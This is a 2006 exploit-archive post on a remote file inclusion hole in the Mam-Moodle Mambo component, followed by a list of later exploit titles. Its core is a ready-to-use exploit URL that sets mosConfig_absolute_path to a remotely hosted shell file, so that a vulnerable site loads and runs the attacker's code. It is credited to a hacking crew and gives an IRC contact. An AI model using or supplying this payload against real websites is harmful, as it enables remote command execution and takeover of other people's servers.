exploits , vulnerabilities , articles , Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability

2006-07-23

Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability

Rated as : High Risk

####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd
securitydot.net - 2006-07-23

Exploits - newest 10 RSS | More

2007-06-15 57314 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34230 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42468 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29353 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19788 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16723 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19429 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16608 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33631 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17248 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit